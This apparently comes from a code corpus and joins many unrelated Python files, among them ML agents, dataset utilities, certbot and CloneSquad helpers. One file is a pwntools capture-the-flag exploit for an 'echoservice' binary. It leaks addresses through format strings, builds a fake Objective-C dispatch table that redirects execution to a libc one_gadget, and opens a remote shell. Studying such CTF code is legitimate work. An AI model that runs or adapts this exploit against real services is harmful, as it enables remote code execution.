buttons = ('Yes', 'No','Cancel'),
message_text =
'Save current state of Ifeffit before Exit?')
res = d.activate()
if (res == 'Yes'):
u = self.save_state(self.root)
if (u == None): res = 'Cancel'
if (res != 'Cancel'):
self.root.destroy()
sys.exit(0)
def help(self):
self.about.show()
if (__name__ == '__main__'):
GIFeffit(load=sys.argv[1:])
| StarcoderdataPython |
3367822 | <reponame>Corb3nik/fixenv
#!/usr/bin/env python2
import sys
import argparse
import binascii
from pwn import *
# python solution.py -e remote ./echoservice -i echo.stillhackinganyway.nl -p 1337
# You need the binary (echoservice) in the same directory
# You need the libc (libc6_2.23-0ubuntu9_amd64.so) with hash 885acc6870b8ba98983e88e578179a2c
def leak_heap():
lookup = "CORB3NIK"
payload = lookup + "%4$p"
p.sendline(payload)
p.recvuntil(lookup)
heap_addr = int(p.recvline().strip()[2:], 16)
return heap_addr
def create_heap_chunk(data):
lookup = "CORB3NIK"
payload = "%4$p" + "CORB" + data
payload += "\x00" * (0x100 - len(payload))
p.sendline(payload)
#leak = p.recvuntil("CORB", drop=True).split(" ", 3)[-1].rjust(8, "\x00")
heap_hint = int(leak, 16)
p.clean()
return heap_hint
def leak_addr(addr):
p.clean()
p.sendline("%13$SCOR" + p64(addr))
leak = p.recvuntil("COR", drop=True).split(" ", 3)[-1]
decoded = leak.decode('utf8')
leak = ""
for c in decoded:
upper = (ord(c) & 0xff00) >> 8
lower = ord(c) & 0xff
leak += chr(lower) + chr(upper)
leak += "\x00"
p.clean()
return leak
def exploit():
# Leak stack
p.sendline("%142$p")
stack = int(p.recvline().split(" ", 3)[-1], 16)
log.info("Stack : 0x%x" % stack)
# Leak binary
code = u64(leak_addr(stack).ljust(8, "\x00"))
log.info("Code segment : 0x%x" % code)
# Leak libc
#libc = u64(leak_addr(stack + 8).ljust(8, "\x00"))
#log.info("Libc : 0x%x" % libc)
# Leak fgets GOT
fgets = u64(leak_addr(code + 2100560).ljust(8, "\x00"))
log.info("fgets() : 0x%x" % fgets)
# Leak __libc_start_main GOT
# LIBC SEEMS TO BE libc6_2.23-0ubuntu9_amd64
#__libc_start_main = u64(leak_addr(code + 2100592).ljust(8, "\x00"))
#log.info("__libc_start_main() : 0x%x" % __libc_start_main)
# Calculate libc base + one_gadget
base = fgets - 0x6dad0
one_gadget = base + 0x4526a
log.info("one_gadget should be at : 0x%x" % one_gadget)
# Leak Heap
heap = u64(leak_addr(base+0x3c48e8).ljust(8, '\x00'))
log.info("heap : 0x%x" % heap)
### Actual WORKING exploit ###
### Two values need to be changed, scroll down.
# Setup fake objc_object pointer
next_chunk = heap + 247 # <==== Change the second value here
dtable = next_chunk + 0x100
bucket_pointers = dtable + 0x50
buckets = bucket_pointers + 0x100
log.info("Next heap chunk : 0x%x" % next_chunk)
payload = ""
payload += "\x00" * 0x108 # padding
# objc_class struct start
payload += p64(next_chunk)
payload += "R" * 0x38 # useless
payload += p64(dtable) # struct sarray* dtable value
payload += "R" * 0xb8
log.info("dtable : 0x%x" % dtable)
# dtable start
payload += p64(bucket_pointers) # struct sbucket** bucket_pointers
payload += "R" * 0x20
payload += p64(0x1337) # dtable size?
payload += "R" * 0x20
log.info("Bucket pointers : 0x%x" % bucket_pointers)
# bucket pointer list
payload += p64(0x1337) * 0x3
payload += p64(buckets) # bucket pointer
payload += p64(0x1337) * 0x0f
payload += "R" * 0x68
log.info("Buckets : 0x%x" % bucket_pointers)
# bucket list
payload += p64(one_gadget) * 0x14 # <==== Change this for 1337 RIP controle
payload += "R" * (0x350 - len(payload))
p.sendline(payload)
p.recvline()
## TESTING ##
#print repr(leak_addr(next_chunk))
#print repr(leak_addr(next_chunk+0x40))
#payload = "%13$p" + "AAA" + p64(next_chunk+8) # DEBUG
payload = "%13$@" + "AAA" + p64(next_chunk)
p.sendline(payload)
p.sendline("cat /flag")
p.interactive()
if __name__ == '__main__':
# Argument parser
parser = argparse.ArgumentParser(description='Exploit Dev Template')
parser.add_argument('binary', help="Binary to exploit")
parser.add_argument('-e', '--env', choices=['local', 'remote'],
help='Default : local',
default='local')
parser.add_argument('-i', help="remote IP")
parser.add_argument('-p', help="remote port")
args = parser.parse_args()
# Validate that an IP and port has been specified for remote env
if args.env == "remote" and (args.i == None or args.p == None):
print "%s : missing IP and/or port" % sys.argv[0]
exit()
# Load the binary
try:
binary = ELF(args.binary)
except:
log.warn("Issue opening %s" % args.binary)
exit()
try:
libc = binary.libc
except:
log.warn("Libc not loaded.")
env = args.env
loot = {}
if env == "local":
p = process([args.binary], env={"LD_PRELOAD":"./libc6_2.23-0ubuntu9_amd64.so"})
log.info(util.proc.pidof(p))
elif env == "remote":
p = remote(args.i, args.p)
pause()
exploit()
| StarcoderdataPython |
117288 | <filename>ddpg-bipedal/pytorch-imp/MyAgent.py
import numpy as np
import torch
import torch.nn.functional as F
from MyModel import *
import copy
from collections import deque, namedtuple
import random
# import heapq
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
class ReplayBuffer():
def __init__(self, sample_size, max_len=int(1e5)):
self.buffer = deque(maxlen=max_len)
self.sample_size = sample_size
self.experience = namedtuple('experience', ('state', 'action', 'reward', 'next_state', 'done'))
def add(self, state, action, reward, next_state, done):
exp = self.experience(state, action, reward, next_state, done)
# here using exception handler to avoid unnecessary overhead in general
# try:
# if len(self.buffer) <= self.max_len:
# heapq.heappush(self.buffer, [error, exp])
# else:
# heapq.heapreplace(self.buffer, [error, exp])
# except(ValueError):
# errors = [item[0] for item in self.buffer]
# new_error_fn = lambda: error + random.uniform(1e-6, 1e-5)
# new_error = new_error_fn()
# while new_error in errors:
# new_error = new_error_fn()
# assert new_error not in errors, 'The error is already in the buffer.'
# if len(self.buffer) <= self.max_len:
# heapq.heappush(self.buffer, [new_error, exp])
# else:
# heapq.heapreplace(self.buffer, [new_error, exp])
self.buffer.append(exp)
def sample(self):
# _, exps = zip(*random.sample(self.buffer, self.sample_size))
exps = random.sample(self.buffer, self.sample_size)
states = torch.from_numpy(np.vstack([e.state for e in exps if e is not None])).float().to(device)
actions = torch.from_numpy(np.vstack([e.action for e in exps if e is not None])).float().to(device)
rewards = torch.from_numpy(np.vstack([e.reward for e in exps if e is not None])).float().to(device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in exps if e is not None])).float().to(device)
dones = torch.from_numpy(np.vstack([e.done for e in exps if e is not None]).astype(np.uint8)).float().to(device)
return states, actions, rewards, next_states, dones
def __len__(self):
return len(self.buffer)
class Agent():
def __init__(self, state_size, action_size, batch_size=64,
actor_alpha=1e-4, critic_alpha=3e-4, gamma=0.9, tau=1e-3,
weight_decay=1e-4, actor_file=None, critic_file=None):
# hyperparameters
self.gamma = gamma
self.tau = tau
self.noise_decay = 1 + 5e-6
# env info
self.state_size = state_size
self.action_size = action_size
# replay buffer
self.buffer = ReplayBuffer(sample_size=batch_size)
# actor-critic
self.actor_main = Actor(state_size, action_size, param_file=actor_file).to(device)
self.critic_main = Critic(state_size, action_size, param_file=critic_file).to(device)
# target actor-critic
self.actor_target = copy.deepcopy(self.actor_main)
self.critic_target = copy.deepcopy(self.critic_main)
# optimizer
self.actor_optimizer = torch.optim.Adam(self.actor_main.parameters(), lr=actor_alpha)
self.critic_optimizer = torch.optim.Adam(self.critic_main.parameters(), lr=critic_alpha, weight_decay=weight_decay)
def act(self, state):
state = torch.from_numpy(state).float().to(device)
# add noise to parameters
saved_params = []
for param in self.actor_main.parameters():
saved_params.append(copy.deepcopy(param))
param = param + torch.normal(mean=0.0, std=torch.ones_like(param) / (10 * self.noise_decay))
self.noise_decay *= 1 + 5e-6
self.actor_main.eval()
with torch.no_grad():
action = self.actor_main(state).cpu().numpy()
self.actor_main.train()
# restore parameters
for param, saved_param in zip(self.actor_main.parameters(), saved_params):
param = saved_param
return np.clip(action, -1, 1)
def step(self, state, action, reward, next_state, done):
# compute error used as the priority number of priority queue
# state_tensor = torch.from_numpy(np.reshape(state, (1, -1))).float().to(device)
# action_tensor = torch.from_numpy(np.reshape(action, (1, -1))).float().to(device)
# next_state_tensor = torch.from_numpy(np.reshape(next_state, (1, -1))).float().to(device)
#
# self.actor_main.eval()
# self.critic_main.eval()
# with torch.no_grad():
# value = self.critic_main(state_tensor, action_tensor).cpu().numpy()
# next_action_tensor = self.actor_main(next_state_tensor)
# next_value = self.critic_main(next_state_tensor, next_action_tensor).cpu().numpy()
# self.actor_main.train()
# self.critic_main.train()
#
# error = reward + (1 - done) * self.gamma * next_value - value
#
# error = error.item()
self.buffer.add(state, action, reward, next_state, done)
if len(self.buffer) > self.buffer.sample_size + 100:
self._learn()
def _learn(self):
states, actions, rewards, next_states, dones = self.buffer.sample()
targets = rewards + (1 - dones) * self.gamma * self.critic_target(next_states, self.actor_target(next_states)).detach()
critic_loss = F.mse_loss(self.critic_main(states, actions), targets)
actor_loss = -self.critic_main(states, self.actor_main(states)).mean()
# update critic
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
# update actor
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
# update the target networks
self._moving_average(self.actor_main, self.actor_target)
self._moving_average(self.critic_main, self.critic_target)
def _moving_average(self, main, target):
for target_param, main_param in zip(target.parameters(), main.parameters()):
target_param.data.copy_(self.tau * main_param.data + (1.0 - self.tau) * target_param.data)
| StarcoderdataPython |
3272000 | <filename>reference_book/api/filters.py
from rest_framework import filters
class CustomSearchFilter(filters.SearchFilter):
search_param = 'q'
| StarcoderdataPython |
1766158 | <reponame>qyl2021/certbot<filename>tools/pip_install.py
#!/usr/bin/env python
# pip installs packages using pinned package versions. If CERTBOT_OLDEST is set
# to 1, a combination of tools/oldest_constraints.txt and
# tools/dev_constraints.txt is used, otherwise, tools/requirements.txt is used.
from __future__ import absolute_import
from __future__ import print_function
import contextlib
import os
import re
import shutil
import subprocess
import sys
import tempfile
import merge_requirements as merge_module
import readlink
# Once this code doesn't need to support Python 2, we can simply use
# tempfile.TemporaryDirectory.
@contextlib.contextmanager
def temporary_directory():
dirpath = tempfile.mkdtemp()
try:
yield dirpath
finally:
shutil.rmtree(dirpath)
def find_tools_path():
return os.path.dirname(readlink.main(__file__))
def certbot_oldest_processing(tools_path, constraints_path):
# The order of the files in this list matters as files specified later can
# override the pinnings found in earlier files.
pinning_files = [os.path.join(tools_path, 'dev_constraints.txt'),
os.path.join(tools_path, 'oldest_constraints.txt')]
with open(constraints_path, 'w') as fd:
fd.write(merge_module.main(*pinning_files))
def certbot_normal_processing(tools_path, constraints_path):
repo_path = os.path.dirname(tools_path)
requirements = os.path.normpath(os.path.join(
repo_path, 'tools/requirements.txt'))
shutil.copy(requirements, constraints_path)
def call_with_print(command, env=None):
if not env:
env = os.environ
print(command)
subprocess.check_call(command, shell=True, env=env)
def pip_install_with_print(args_str, env=None):
if not env:
env = os.environ
command = ['"', sys.executable, '" -m pip install --disable-pip-version-check ', args_str]
call_with_print(''.join(command), env=env)
def main(args):
tools_path = find_tools_path()
with temporary_directory() as working_dir:
if os.environ.get('CERTBOT_NO_PIN') == '1':
# With unpinned dependencies, there is no constraint
pip_install_with_print(' '.join(args))
else:
# Otherwise, we merge requirements to build the constraints and pin dependencies
constraints_path = os.path.join(working_dir, 'constraints.txt')
if os.environ.get('CERTBOT_OLDEST') == '1':
certbot_oldest_processing(tools_path, constraints_path)
else:
certbot_normal_processing(tools_path, constraints_path)
env = os.environ.copy()
env["PIP_CONSTRAINT"] = constraints_path
pip_install_with_print(' '.join(args), env=env)
if __name__ == '__main__':
main(sys.argv[1:])
| StarcoderdataPython |
3295915 | # Copyright 2017. <NAME>. All rights reserved
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import pandas as pd
import numpy as np
import csv
import h5py
from six import string_types
from bmtk.utils import sonata
class Rates(object):
def __iter__(self):
return self
def __next__(self):
raise StopIteration
next = __next__ # For Python 2
class NormalRates(Rates):
def __init__(self, t_start, t_end, rate_mu, rate_sigma=5.0):
self.t_start = t_start
self.t_end = t_end
self.period_mu = 1.0/float(rate_mu)
self.period_sigma = 1.0/float(rate_mu + rate_sigma)
self._current_t = t_start
def __next__(self):
self._current_t += abs(np.random.normal(self.period_mu, self.period_sigma))
if self._current_t > self.t_end:
self._current_t = self.t_start
raise StopIteration
else:
return self._current_t
next = __next__ # For Python 2
class SpikesGenerator(object):
def __init__(self, nodes, populations=None, t_min=0, t_max=1.0):
self._t_min = t_min
self._t_max = t_max
if isinstance(nodes, string_types):
nodes_h5 = h5py.File(nodes, 'r')
nodes_grp = nodes_h5['/nodes']
if populations is None:
populations = nodes_grp.keys()
# TODO: Need a way to Use sonata library without having to use node-types
nodes = []
for node_pop in populations:
nodes.extend(nodes_grp[node_pop]['node_id'])
self._nodes = {n: Rates() for n in nodes}
def set_rate(self, firing_rate, gids=None, t_start=None, t_end=None):
t_start = t_start or self._t_min
assert(t_start >= self._t_min)
t_end = t_end or self._t_max
assert(t_end <= self._t_max)
gids = gids or self._nodes.keys()
for gid in gids:
self._nodes[gid] = NormalRates(t_start, t_end, firing_rate)
def save_csv(self, csv_file_name, in_ms=False):
conv = 1000.0 if in_ms else 1.0
with open(csv_file_name, 'w') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=' ')
csv_writer.writerow(['gid', 'spike-times'])
for gid, rate_gen in self._nodes.items():
csv_writer.writerow([gid, ','.join(str(r*conv) for r in rate_gen)])
| StarcoderdataPython |
157583 | """Estimation of lambdaN"""
import matplotlib.pyplot as plt
import networkx as nx
from numpy import *
import scipy
def maximum_eigen():
list1 = []
list2 = []
for i in range(10, 31):
for j in range(0, 10):
G1 = nx.barabasi_albert_graph(500, i, seed=j)
degree_sequence = [d for n, d in G1.degree()]
maxeigen = max(degree_sequence)
lap_matrix = nx.laplacian_matrix(G1).todense()
eigval, eigvec = scipy.linalg.eig(lap_matrix)
d = eigval.sort()
eig_max = eigval[-1]
list1.append(maxeigen)
list2.append(float(eig_max))
#print(list1)
#print(list2)
return list1, list2
estimation, maxeigen = maximum_eigen()
print(estimation)
print(maxeigen)
plt.scatter(maxeigen, estimation, c='b', s=6., label=r'Estimation of $\lambda^{(N)}$')
plt.plot(maxeigen, maxeigen, c='y', label = r'$\lambda^{(N)}$')
plt.xlabel(r'$\lambda^{(N)}$')
plt.ylabel(r'estimate $\lambda^{(N)}$')
plt.savefig('estimation_accuracy_maxeigen.pdf')
plt.legend()
plt.show() | StarcoderdataPython |
191919 | <gh_stars>10-100
from abc import ABC, abstractmethod
from typing import Generator, Type
from open_sea_v1.endpoints.client import ClientParams
from open_sea_v1.responses.abc import BaseResponse
class BaseEndpoint(ABC):
@property
@abstractmethod
def __post_init__(self):
"""Using post_init to run param validation"""
@property
@abstractmethod
def client_params(self) -> ClientParams:
"""Instance of common OpenSea Endpoint parameters."""
@property
@abstractmethod
def _response_type(self) -> Type[BaseResponse]:
""""""
@property
@abstractmethod
def url(self) -> str:
"""Endpoint URL"""
@abstractmethod
def _parse_json(self) -> Generator[list[list[BaseResponse]], None, None]:
"""Returns all pages for the query."""
@property
@abstractmethod
def get_params(self) -> str:
"""Endpoint URL"""
@property
@abstractmethod
def _validate_request_params(self) -> None:
""""""
| StarcoderdataPython |
3278847 | import os
from jennie.ubuntu.nginxfiles import *
def install_phpmyadmin():
os.system("wget https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.gz")
os.system("tar -xvf phpMyAdmin-5.1.0-all-languages.tar.gz")
os.system("mv phpMyAdmin-5.1.0-all-languages /var/www/html/phpmyadmin")
os.system("rm -rf phpMyAdmin-5.1.0-all-languages.tar.gz")
nginx_config = DEFAULT_PHPMYADMIN_CONF
open("/etc/nginx/conf.d/default.conf", "w").write(nginx_config)
os.system("systemctl reload nginx")
print ('''\n\nphpmyadmin is up and running at http://YOURIP/phpmyadmin/.\n\n''') | StarcoderdataPython |
4800909 | <filename>airwaveapiclient/tests/test_apdetail.py
# -*- coding: utf-8 -*-
"""UnitTests for airwaveapiclient."""
import os
import unittest
from airwaveapiclient import APDetail
from airwaveapiclient.tests import test_utils
class APDetailUnitTests(unittest.TestCase):
"""Class APDetailUnitTests.
Unit test for APDetail.
"""
def setUp(self):
"""Setup."""
self.ap_detail_file = 'test_apdetail.xml'
self.here = os.path.dirname(os.path.abspath(__file__))
path = os.path.join(self.here, self.ap_detail_file)
self.ap_detail = test_utils.read_file(path)
self.obj = APDetail(self.ap_detail)
def tearDown(self):
"""Tear down."""
def test_init(self):
"""Test init."""
self.assertNotEqual(self.obj, None)
def test_radio_type(self):
"""Test radio_type."""
for radio in self.obj['radio']:
if radio['radio_type'] == 'bgn':
self.assertEqual(radio['radio_interface'], '2')
if radio['radio_type'] == 'aN':
self.assertEqual(radio['radio_interface'], '1')
| StarcoderdataPython |
3327454 | # HEAD
# Modules - Creating and using directory module as package
# DESCRIPTION
# Describes the usage of package init.py file with other file module
# Imports file module explicitly - bypasses __init__.py scoping
# Imports also uses alias for the imported file module
# Describes usage of import statements
# and using a directory + function as a package
# Creating __init__.py to create a package
# RESOURCES
#
# Just defining what has to be exported using the __all__ variable
# Please remember the importing file can bypass this by
# explicitly accessing the unexported and unscoped file module
__all__ = ['print']
# To remove modules just remove the name of the module from the array of modules to be exported
# __all__ = []
| StarcoderdataPython |
1689458 | <gh_stars>1-10
import tensorflow as tf
import numpy as np
from tensorflow.keras import layers
class SIR_Cell(layers.Layer):
def __init__(self, population, **kwargs):
'''
Initialization of the Cell. state_size and output_size are mandatory elements.
Since this is a simple Markov Chain, there is no hidden state
The size of the output is 3 (S, I, R)
'''
self.state_size = 3
self.output_size = 3
self.Population = population
# self.gamma = tf.constant(gamma, shape=(1,), dtype=tf.float32, name='gamma')
super(SIR_Cell, self).__init__(**kwargs)
def build(self, input_shape):
self.beta = self.add_weight(shape=(1,),
initializer='uniform', name='beta')
self.gamma = self.add_weight(shape=(1,),
initializer='uniform', name='gamma')
self.build = True
def call(self, inputs, states):
'''
inputs are (batch, input_size)
states are (batch, state_size)
'''
S = states[0][:,0]
I = states[0][:,1]
R = states[0][:,2]
S_next = S - inputs[:,0]*inputs[:,1]*S*I*self.beta/self.Population
I_next = I + inputs[:,0]*inputs[:,1]*S*I*self.beta/self.Population - inputs[:,1]*self.gamma*I
R_next = R + inputs[:,1]*self.gamma*I
prediction = tf.stack([S_next, I_next, R_next], axis=1)
next_state = tf.stack([S_next, I_next, R_next], axis=1)
return prediction, next_state
def main():
return -1
if __name__ == '__main__':
# Do nothing
main() | StarcoderdataPython |
1708111 | <filename>src/evoml/framework/datasets/_base.py
from genericpath import exists
from math import e
from os import environ, listdir, makedirs, rmdir, path
from os.path import dirname, expanduser, isdir, join, splitext, basename
from typing import Tuple
import pandas as pd
import shutil
from scipy.sparse import data
from sklearn.model_selection import train_test_split
import numpy as np
from pathlib import Path
import logging
from .. import datasets
def _set_data_home(data_home=None):
if data_home is None:
data_home = join('~', 'evoml_framework_data')
environ["EVOML_FRAMEWORK_DATA"] = data_home
def _load(train_file, test_file, name):
if not exists(train_file) or \
(test_file is not None and not exists(test_file)):
raise IOError("Dataset missing! %s" % name)
train_dataset = np.genfromtxt(train_file, delimiter=',', dtype=np.int32)
test_dataset = np.genfromtxt(test_file, delimiter=',', dtype=np.int32)
return train_dataset, test_dataset
def _toense(data):
X_train, y_train, X_test, y_test = data
X_train = X_train.toarray()
if X_test is not None:
X_test = X_test.toarray()
return X_train, y_train, X_test, y_test
def _read_experiment_details(data_file, column_names, prefix, offset):
# Delimiter
data_file_delimiter = ','
# The max column count a line in the file could have
largest_column_count = 0
# Loop the data lines
with open(data_file, 'r') as temp_f:
# Read the lines
lines = temp_f.readlines()
for l in lines:
# Count the column count for the current line
column_count = len(l.split(data_file_delimiter)) + 1
# Set the new most column count
largest_column_count = column_count if largest_column_count < column_count else largest_column_count
# Generate column names (will be 0, 1, 2, ..., largest_column_count - 1)
cl_names = column_names + [prefix + str(i) for i in range(0, largest_column_count-offset)]
# Read csv
return pd.read_csv(data_file, header=None, delimiter=data_file_delimiter, names=cl_names, dtype=object)[1:]
# def _get_df_with_different_columns(data_file):
# # Delimiter
# data_file_delimiter = ','
# # The max column count a line in the file could have
# largest_column_count = 0
# # Loop the data lines
# with open(data_file, 'r') as temp_f:
# # Read the lines
# lines = temp_f.readlines()
# for l in lines:
# # Count the column count for the current line
# column_count = len(l.split(data_file_delimiter)) + 1
# # Set the new most column count
# largest_column_count = column_count if largest_column_count < column_count else largest_column_count
# # Generate column names (will be 0, 1, 2, ..., largest_column_count - 1)
# column_names = ['Dataset', 'Optimizer', 'objfname', 'k'] + ['label' + str(i) for i in range(0, largest_column_count-4)]
# # Read csv
# return pd.read_csv(data_file, header=None, delimiter=data_file_delimiter, names=column_names, dtype=object)[1:]
def load_dataset(name):
data_home = get_data_home()
train_file = join(data_home, name, "train.csv")
test_file = join(data_home, name, "test.csv")
return _toense(_load(train_file, test_file, name))
def get_data_home(data_home=None) -> str:
"""Return the path of the evoml-framework data dir.
"""
if data_home is None:
# data_home = environ.get('EVOML_FRAMEWORK_DATA',
# join('~', 'evoml_framework_data'))
# print(datasets.__path__)
data_home = join(datasets.__path__[0],"data")
print(data_home)
# update new path
data_home = expanduser(data_home)
makedirs(data_home, exist_ok=True)
return data_home
def clear_data_home(data_home=None):
"""Delete all the content of the data home cache.
"""
data_home = get_data_home(data_home)
shutil.rmtree(data_home)
def split_dataset(src, dst=None, ratio=0.3, cluster=False):
""" divide a dataset into train and test sets
"""
if (dst is None):
dst = join(dirname(src), splitext(basename(src))[0])
shutil.rmtree(dst, ignore_errors=True)
makedirs(dst, exist_ok=True)
df = pd.read_csv(src)
X = df.iloc[:, 0:(len(df.columns)-1)]
y = df.iloc[:, -1]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=ratio)
pd.concat([X_train, y_train], axis=1).to_csv(
join(dst, 'train.csv'), header=False, index=False)
pd.concat([X_test, y_test], axis=1).to_csv(
join(dst, 'test.csv'), header=False, index=False)
if (cluster is True):
pd.concat([X_train, y_train], axis=1).to_csv(join(Path(dst).parent, basename(src)), header=False, index=False)
def get_dataset(dataset_folder, data_file):
# dataset_folder = path.join(datasets.get_data_home(), dataset_folder)
# print("folder"+ dataset_folder)
return np.genfromtxt(join(
dataset_folder, data_file), delimiter=',', dtype=np.int32)
def get_data_frame_frome_experiment_details_by_dataset(evo_folder, dataset):
experiment_details_Labels_file = join(Path(evo_folder), "experiment_details_Labels.csv")
experiment_details_file = join(Path(evo_folder), "experiment_details.csv")
iterations = _read_experiment_details(experiment_details_file, ["Dataset","Optimizer","objfname","k","ExecutionTime","SSE","Purity","Entropy","HS","CS","VM","AMI","ARI","Fmeasure","TWCV","SC","Accuracy","DI","DB","STDev"], "Iter", 20)
iterations = iterations.loc[iterations['Dataset'] == dataset]
iterations = iterations.iloc[:,20:]
df = _read_experiment_details(experiment_details_Labels_file, ['Dataset', 'Optimizer', 'objfname', 'k'],"label", 4)
df = df.loc[df['Dataset'] == dataset]
df = df.dropna(axis=1, how='all')
iterations = iterations.dropna(axis=1, how='all')
df0 = df.iloc[:,1:3]
df1 = df.iloc[:, 4:]
df2 = df.iloc[:, 3:4]
_re_index(df0)
_re_index(df1)
_re_index(df2)
_re_index(iterations)
print(iterations)
return df0, df1, df2, iterations
def _re_index(df):
# re-index df (1, 2, 3...)
df_index =[]
for i in range(0, len(df)):
df_index.append(i+1)
df.index = (df_index)
| StarcoderdataPython |
1635995 | <reponame>benjamin-gar/clonesquad-ec2-pet-autoscaler
import os
import sys
import re
import hashlib
import json
import math
import gzip
# Hack: Force gzip to have a deterministic output (See https://stackoverflow.com/questions/264224/setting-the-gzip-timestamp-from-python/264303#264303)
class GzipFakeTime:
def time(self):
return 1.1
gzip.time = GzipFakeTime()
import base64
import boto3
from botocore.config import Config
from datetime import datetime
from datetime import timezone
from datetime import timedelta
import requests
from requests_file import FileAdapter
from collections import defaultdict
from iamauth import IAMAuth
import pdb
import debug as Dbg
from aws_xray_sdk.core import xray_recorder
from aws_xray_sdk.core import patch_all
patch_all()
def is_sam_local():
return "AWS_SAM_LOCAL" in os.environ and os.environ["AWS_SAM_LOCAL"] == "true"
import cslog
log = cslog.logger(__name__)
class Boto3ProxyClass(object):
""" boto3 proxy class.
Used for debugging purpose yet.
"""
_clients = {}
_responses = []
def __init__(self, client):
object.__setattr__( self, "_client", client)
@staticmethod
def client(cl, config=None):
if cl in Boto3ProxyClass._clients:
return Boto3ProxyClass._clients[cl]
Boto3ProxyClass._clients[cl] = Boto3ProxyClass(boto3.client(cl, config=config))
return Boto3ProxyClass._clients[cl]
def _proxy_call(self, fname, f, *args, **kwargs):
responses = object.__getattribute__(self, "_responses")
frame = {
"call": fname,
"args": args,
"kwargs": kwargs,
}
r = f(*args, **kwargs)
if fname.startswith("describe"):
frame["response"] = r
#responses.append(frame) # Uncomment this to record all describe API call responses
return r
def __getattribute__(self, name):
attr = getattr(object.__getattribute__(self, "_client"), name)
if hasattr(attr, '__call__'):
return lambda *args, **kwargs: object.__getattribute__(self, "_proxy_call")(name, attr, *args, **kwargs)
return attr
def __delattr__(self, name):
delattr(object.__getattribute__(self, "_client"), name)
def __setattr__(self, name, value):
setattr(object.__getattribute__(self, "_client"), name, value)
def __nonzero__(self):
return bool(object.__getattribute__(self, "_client"))
def __str__(self):
return str(object.__getattribute__(self, "_client"))
def __repr__(self):
return repr(object.__getattribute__(self, "_client"))
def __hash__(self):
return hash(object.__getattribute__(self, "_client"))
def is_direct_launch():
return len(sys.argv) > 1
def utc_now():
return datetime.now(tz=timezone.utc) # datetime.utcnow()
def epoch():
return seconds2utc(0)
def seconds_from_epoch_utc(now=None):
if now is None: now = utc_now()
return int((now - epoch()).total_seconds())
def seconds2utc(seconds):
return datetime.utcfromtimestamp(int(seconds)).replace(tzinfo=timezone.utc)
def str2utc(s, default=None):
if isinstance(s, datetime):
return s
try:
if s.endswith("Z"):
s = s[:-1] + "+00:00"
return datetime.fromisoformat(s)
except:
return default
return None
def sha256(s):
""" Return the SHA256 HEX digest related to the specified string.
"""
m = hashlib.sha256()
m.update(bytes(s,"utf-8"))
return m.hexdigest()
def abs_or_percent(value, default, max_value):
v = default
try:
if value.endswith("%") or value.endswith("p") or value.endswith("P"):
v = math.ceil(float(value[:-1])/100.0 * max_value)
else:
v = int(value)
except:
pass
return v
def str2duration_seconds(s, no_exception=False, default=None):
try:
return int(s)
except:
try:
# Parse timedelta metadata
meta = s.split(",")
metas = {}
for m in meta:
k, v = m.split("=")
metas[k] = float(v)
return timedelta(**metas).total_seconds()
except Exception as e:
if no_exception:
return default
raise e
def decode_json(value):
if value is None:
return None
if value.startswith("b'"):
value = value[2:][:-1]
try:
uncompress = gzip.decompress(base64.b64decode(value))
value = str(uncompress, "utf-8")
except:
pass
return json.loads(value)
def encode_json(value, compress=False):
value_j = json.dumps(value, sort_keys=True, default=str)
if compress:
compressed = gzip.compress(bytes(value_j, "utf-8"), compresslevel=9)
value_j = str(base64.b64encode(compressed), "utf-8")
return value_j
def Session():
s = requests.Session()
s.mount('file://', FileAdapter())
return s
def get_url(url, throw_exception_on_warning=False):
def _warning(msg):
if throw_exception_on_warning:
raise Exception(msg)
else:
log.warning(msg)
if url is None or url == "":
return None
# internal: protocol management
internal_str = "internal:"
if url.startswith(internal_str):
filename = url[len(internal_str):]
paths = [os.getcwd(), "/opt" ]
if "LAMBDA_TASK_ROOT" in os.environ:
paths.insert(0, os.environ["LAMBDA_TASK_ROOT"])
if "CLONESQUAD_DIR" in os.environ:
paths.append(os.environ["CLONESQUAD_DIR"])
paths.append("%s/src/resources/" % os.environ["CLONESQUAD_DIR"])
for path in paths:
for sub_path in [".", "custo", "resources" ]:
try:
f = open("%s/%s/%s" % (path, sub_path, filename), "rb")
except:
continue
return f.read()
_warning("Fail to read internal url '%s'!" % url)
return None
# s3:// protocol management
if url.startswith("s3://"):
m = re.search("^s3://([-.\w]+)/(.*)", url)
if len(m.groups()) != 2:
return None
bucket, key = [m.group(1), m.group(2)]
client = boto3.client("s3")
try:
response = client.get_object(Bucket=bucket, Key=key)
return response["Body"].read()
except Exception as e:
_warning("Failed to fetch S3 url '%s' : %s" % (url, e))
return None
# <other>:// protocols management
s = Session()
s.auth = IAMAuth()
try:
response = s.get(url)
except Exception as e:
